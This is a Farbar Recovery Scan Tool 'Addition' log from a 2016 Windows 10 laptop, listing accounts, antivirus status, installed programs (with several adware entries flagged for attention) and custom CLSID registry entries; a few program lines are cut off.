Addition

Academic year: 2021

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01

Ran by REVERIEN (2016-04-06 15:16:27)

Running from C:\Users\REVERIEN\Desktop

Windows 10 Home Version 1511 (X64) (2016-01-04 12:15:29)

Boot Mode: Normal

==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-1240968423-981972810-3087361095-500 - Administrator - Disabled)

DefaultAccount (S-1-5-21-1240968423-981972810-3087361095-503 - Limited - Disabled)

Guest (S-1-5-21-1240968423-981972810-3087361095-501 - Limited - Disabled) => C:\Users\Guest

HomeGroupUser$ (S-1-5-21-1240968423-981972810-3087361095-1003 - Limited - Enabled)

REVERIEN (S-1-5-21-1240968423-981972810-3087361095-1001 - Administrator - Enabled) => C:\Users\REVERIEN

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.197 - Adobe Systems Incorporated)

Adobe Photoshop 7.0 CE (HKLM-x32\...\Adobe Photoshop 7.0 CE) (Version: 7.0 CE - Adobe Systems, Inc.)

Adobe Reader 9.4.0 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A94000000001}) (Version: 9.4.0 - Adobe Systems Incorporated)

Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.7.157 - Adobe Systems, Inc.)

Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden

Apache Tomcat 6.0 (remove only) (HKLM\...\Apache Tomcat 6.0) (Version: - )

Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)

Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)

ArcGIS 10.1 for Desktop (HKLM-x32\...\ArcGIS 10.1 for Desktop) (Version: 10.1.3035 - Environmental Systems Research Institute, Inc.)

ArcGIS 10.1 for Desktop (x32 Version: 10.1.3035 - Environmental Systems Research Institute, Inc.) Hidden

ArcGIS 10.1 License Manager (HKLM-x32\...\ArcGIS 10.1 License Manager) (Version: 10.1.2891 - Environmental Systems Research Institute, Inc.)

ArcGIS 10.1 License Manager (x32 Version: 10.1.2891 - Environmental Systems Research Institute, Inc.) Hidden

8B3}_is1) (Version: 5.0.1.0 - Auslogics Labs Pty Ltd)

Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden

Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)

BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden

Cambridge Advanced Learner's Dictionary (HKLM-x32\...\Cambridge Advanced Learner's Dictionary) (Version: - )

Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

Destinations (x32 Version: 140.0.0.0 - Hewlett-Packard) Hidden

DNS Unlocker version 1.4 (HKLM-x32\...\{E1527582-8509-4011-B922-29E3FB548882}_is1) (Version: 1.4 - www.dnsunlocker.com) <==== ATTENTION

DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden

Dropbox (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\Dropbox) (Version: 3.16.1 - Dropbox, Inc.)

Easy File Locker 1.5 (HKLM-x32\...\Easy File Locker) (Version: 1.5 - XOSLAB.COM)

Empress of the Deep - The Darkest Secret (x32 Version: 2.2.0.98 - WildTangent) Hidden

Everything 1.3.4.686 (x64) (HKLM\...\Everything) (Version: - )

Google Chrome (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)

Google Drive (HKLM-x32\...\{895D0391-459F-4D45-B8DD-13F0DE70C66E}) (Version: 1.28.1549.1322 - Google, Inc.)

Google Earth (HKLM-x32\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1.5.1557 - Google)

Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google)

Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden

GPL Ghostscript (HKLM\...\GPL Ghostscript 9.18) (Version: 9.18 - Artifex Software Inc.)

HP Commercial Scanjet 5590 TWAIN Driver (HKLM-x32\...\HP Commercial Scanjet 5590 TWAIN Driver) (Version: - )

HP Imaging Device Functions 14.5 (HKLM\...\HP Imaging Device Functions) (Version: 14.5 - HP)

HP Update (HKLM-x32\...\{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}) (Version: 5.002.006.003 - Hewlett-Packard)

hpg5590 (x32 Version: 140.000.000.000 - Hewlett-Packard) Hidden

HPScanjet5590Corporate11 (HKLM-x32\...\{16551913-D97B-4E8A-B751-44CBDC99CF5C}) (Version: 2.20.0000 - HP)

IBM SPSS Statistics 20 (HKLM-x32\...\{2AF8017B-E503-408F-AACE-8A335452CAD2}) (Version: 20.0.0.0 - IBM Corp)

iFree Skype Recorder 6.0.15 (HKLM-x32\...\iFree Skype Recorder) (Version: 6.0.15 - iFree Skype Recorder)

Intel AppUp(R) center (HKLM-x32\...\Intel AppUp(R) center 41663) (Version: 3.8.0.41663.61 - Intel)

Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)

Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)

Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.2.1001 - Intel Corporation)

Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)

Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - )

Island Tribe (x32 Version: 2.2.0.98 - WildTangent) Hidden

istartpageing (HKLM-x32\...\istartpageing) (Version: 1.0.0.6 - ) <==== ATTENTION

Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)

8.0.600.27 - Oracle Corporation)

Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)

Jewel Quest Solitaire 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden

Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Kaspersky Internet Security (HKLM-x32\...\InstallWIX_{653C1B5A-3287-47B1-8613-0745D4E771C4}) (Version: 15.0.0.463 - Kaspersky Lab)

Kaspersky Internet Security (x32 Version: 15.0.0.463 - Kaspersky Lab) Hidden

KMSnano 24 (HKLM\...\KMSnano 24_is1) (Version: KMSnano 24 - )

Learning Essentials for Microsoft Office (HKLM-x32\...\{75F3A4B2-F6E8-434D-A2EF-DBBC016C6CB2}) (Version: 2.0 - Microsoft)

Macromedia Dreamweaver 8 (HKLM-x32\...\{0837A661-FEC3-48B3-876C-91E7D32048A9}) (Version: 8.0.0.2734 - Macromedia)

Macromedia Extension Manager (HKLM-x32\...\{5546CDB5-2CE2-498B-B059-5B3BF81FC41F}) (Version: 1.7.240 - Macromedia, Inc.)

Magic Academy (x32 Version: 2.2.0.98 - WildTangent) Hidden

Malware Protection Live (HKLM-x32\...\MalwareProtectionLive) (Version: - )

Mendeley Desktop 1.13.8 (HKLM-x32\...\Mendeley Desktop) (Version: 1.13.8 - Mendeley Ltd.)

Microsoft Math (HKLM-x32\...\{07043840-959A-4B0D-8825-2C533F0DDB19}) (Version: 2007 - Microsoft Corporation)

Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Student 2007 for Learning Essentials (HKLM-x32\...\{Microsoft Student 2007_54A0E938-8390-489F-8F1A-563673334DFE}) (Version: - )

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.60724 - Microsoft Corporation)

MiKTeX 2.9 (HKLM\...\MiKTeX 2.9) (Version: 2.9 - MiKTeX.org)

Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Mozilla Firefox 45.0.1 (x86 fr) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 fr)) (Version: 45.0.1 - Mozilla)

Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.1.5918 - Mozilla)

MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)

MySQL Connector C++ 1.1.6 (HKLM\...\{80EE5F65-5553-47A1-B6A9-8BF3211D21A3}) (Version: 1.1.6 - Oracle and/or its affiliates)

MySQL Connector J (HKLM-x32\...\{8A9B23F6-9C1D-4DB2-8254-EAB70EF4325B}) (Version: 5.1.36 - Oracle Corporation)

MySQL Connector Net 6.9.7 (HKLM-x32\...\{2C148B86-FF80-49A7-BA18-E4CEF6464AE6}) (Version: 6.9.7 - Oracle)

MySQL Connector/C 6.1 (HKLM\...\{ABC3A516-54E3-414B-B501-762E7FB2F9D5}) (Version: 6.1.6 - Oracle Corporation)

MySQL Connector/ODBC 5.3 (HKLM\...\{A1991404-2634-47E1-BC45-8F3B5014B1D1}) (Version: 5.3.4 - Oracle Corporation)

MySQL Documents 5.6 (HKLM-x32\...\{4D17B5C1-7388-4647-9A24-D5FDD173D4EA}) (Version: 5.6.27 - Oracle Corporation)

MySQL Examples and Samples 5.6 (HKLM-x32\...\{3E1DCC2B-8A78-4E91-B2EC-9DCFE25D41FA}) (Version: 5.6.27 - Oracle Corporation)

MySQL For Excel 1.3.4 (HKLM-x32\...\{A0352E65-6E78-48B3-B6D6-B3208E663249}) (Version: 1.3.4 - Oracle)

MySQL Installer - Community (HKLM-x32\...\{9A6E1C77-5B57-43C5-9B96-95ABDE40AE7F}) (Version: 1.4.11.0 - Oracle Corporation)

MySQL Notifier 1.1.6 (HKLM-x32\...\{CB76A6E9-B184-461D-A8BE-7D0D73199545}) (Version: 1.1.6 - Oracle)

MySQL Server 5.6 (HKLM\...\{861A680B-2084-444B-BE8D-89E153BEEEE3}) (Version: 5.6.27 - Oracle Corporation)

Nero 8 (HKLM-x32\...\{9EDBB857-8028-49CD-B9C9-0B4D10CD1033}) (Version: 8.10.293 - Nero AG)

OCR Software by I.R.I.S. 14.5 (HKLM\...\HPOCR) (Version: 14.5 - HP)

Office Regenerator (HKLM-x32\...\{2E2E7A4E-9FA7-4E9D-A875-53B9F943F14E}) (Version: 20.11.0003 - Abstradrome)

Office Timeline (HKLM-x32\...\{08E5CEB9-36D2-4F52-9320-1DF41686A69A}) (Version: 3.6.0 - Office Timeline)

Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version: 15.0.4569.1506 - Microsoft Corporation) Hidden

PCTeX version 6.1 (HKLM-x32\...\PCTeXv6_is1) (Version: - )

PDF Annotator 5.0.0.511 (HKLM-x32\...\PDFAnnotator_is1) (Version: 5.0.0.511 - GRAHL software design)

Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden

Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden

Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden

Premium Sound HD (HKLM\...\{000A208E-1050-4181-AC37-E13DA9254B73}) (Version: 1.12.6000 - DTS, Inc.)

Print to PDF Annotator (novaPDF OEM 7.7 printer) (HKLM\...\Print to PDF Annotator_is1) (Version: 7.7.400 - Softland)

PrtScr 1.5 (HKLM-x32\...\PrtScr_is1) (Version: - FireStarter)

Quantum GIS Lisboa 1.8.0 Lisboa (HKLM-x32\...\Quantum GIS Lisboa) (Version: - QGIS Development Team)

.80.95 - Apple Inc.)

RealDownloader (x32 Version: 18.1.3.103 - RealNetworks, Inc.) Hidden

RealDownloader (x32 Version: 18.1.3.104 - RealNetworks) Hidden

RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden

RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden

RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden

RealPlayer (RealTimes) (HKLM-x32\...\RealPlayer 18.1) (Version: 18.1.3 - RealNetworks)

REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (Version: 3.800.800.121813 - REALTEK Semiconductor Corp.)

Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6794 - Realtek Semiconductor Corp.)

Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.8400.30136 - Realtek Semiconductor Corp.)

Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Version: 2.00.0020 - REALTEK Semiconductor Corp.)

RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden

Reimage Protector (HKLM\...\Reimage Protector) (Version: - Reimage) <==== ATTENTION

Scan (x32 Version: 14.0.1.0 - Hewlett-Packard) Hidden

Scanjet 5590 (HKLM\...\{A64EBD98-D9FB-4014-8658-F61C0EFFB87C}) (Version: 14.5 - HP)

Screencast-O-Matic v2.0 (HKLM-x32\...\Screencast-O-Matic v2.0) (Version: v2-1.8 - Screencast-O-Matic)

Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM-x32\...\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7F6C4883-A18C-459A-82C1-A2F9403F2DA6}) (Version: - Microsoft)

Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)

Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)

Skype™ 7.8 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.8.102 - Skype Technologies S.A.)

SR9USB (HKLM-x32\...\{DA387CD3-3524-43BF-B744-17C9FE27734D}) (Version: 1.00.10377.0 - SUPERAL Semiconductor, Inc.)

Stata 13 (HKLM-x32\...\{217BE429-022D-4094-960F-0376E1CBE13E}) (Version: 13.0 - StataCorp LP)

swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden

Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.16.3 - Synaptics Incorporated)

Texmaker (HKLM-x32\...\Texmaker) (Version: - )

TeXstudio 2.9.4 (HKLM-x32\...\TeXstudio_is1) (Version: 2.9.4 - Benito van der Zander)

TOSHIBA Desktop Assist (HKLM\...\{95CCACF0-010D-45F0-82BF-858643D8BC02}) (Version: 1.00.08.6402 - Toshiba Corporation)

TOSHIBA eco Utility (HKLM\...\{5944B9D4-3C2A-48DE-931E-26B31714A2F7}) (Version: 2.0.0.6415 - Toshiba Corporation)

TOSHIBA Function Key (HKLM\...\{16562A90-71BC-41A0-B890-D91B0C267120}) (Version: 1.00.6626.6410 - Toshiba Corporation)

TOSHIBA Manuals (HKLM-x32\...\{90FF4432-21B7-4AF6-BA6E-FB8C1FED9173}) (Version: 10.10 - TOSHIBA)

TOSHIBA Password Utility (HKLM-x32\...\InstallShield_{78931270-BC9E-441A-A52B-73ECD4ACFAB5}) (Version: 2.00.973 - Toshiba Corporation)

TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.8.17.640104 - Toshiba Corporation)

TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.2.1.54043006 - Toshiba Corporation)

TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}) (Version: 1.2.2.00 - TOSHIBA Corporation)

TOSHIBA Service Station (HKLM\...\{B8C8422F-01F1-4791-B084-047AAFF9BFCC}) (Version: 2.4.4 - TOSHIBA)

TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Version: 1.00.0015 - Toshiba Corporation)

TOSHIBA System Settings (HKLM-x32\...\{05A55927-DB9B-4E26-BA44-828EBFF829F0}) (Version: 1.00.0002.32002 - Toshiba Corporation)

Toshiba TEMPRO (HKLM-x32\...\{F76F5214-83A8-4030-80C9-1EF57391D72A}) (Version: 4.3.3 - Toshiba Europe GmbH)

TOSHIBA VIDEO PLAYER (HKLM\...\{FF07604E-C860-40E9-A230-E37FA41F103A}) (Version: 5.1.0.21-A - Toshiba Corporation)

Update for Skype for Business 2015 (KB3039776) 32-Bit Edition (HKLM-x32\...\{90150000-012B-0409-0000-0000000FF1CE}_Office15.PROPLUS_{9F6B3627-AF9E-40A5-AAD5-3497C4327616}) (Version: - Microsoft)

Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19FC94DD77E2}) (Version: - Microsoft)

Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{90150000-002A-0000-1000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19FC94DD77E2}) (Version: - Microsoft)

Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{90150000-012B-0409-0000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19FC94DD77E2}) (Version: - Microsoft)

Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden

UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden

VCRedistSetup (x32 Version: 1.0.0 - Nero AG) Hidden

Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden

Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hidden

VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)

VSee (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\VSee) (Version: 15.0.0.1018 - VSee Lab Inc)

WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden

WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)

WildTangent Games App (Toshiba Games) (x32 Version: 4.0.9.7 - WildTangent) Hidden

Windows Driver Package - Hewlett-Packard Image (12/27/2006 8.0.0.0) (HKLM\...\A86F74A8853ED6B1102811674C7B366AF1B276BB) (Version: 12/27/2006 8.0.0.0 - Hewlett-Packard)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)

Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)

WinMend Folder Hidden 1.5.3 (HKLM-x32\...\WinMend Folder Hidden_is1) (Version: - WinMend.com)

WinRAR 5.21 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.1 - win.rar GmbH)

XAMPP (HKLM-x32\...\xampp) (Version: 5.6.8-0 - Bitnami)

YTD Video Downloader 5.1.0 (HKLM-x32\...\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}) (Version: 5.1.0 - GreenTree Applications SRL) <==== ATTENTION

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\REVERIEN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\REVERIEN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\REVERIEN\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\REVERIEN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\REVERIEN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\REVERIEN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\REVERIEN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\REVERIEN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\REVERIEN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\REVERIEN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

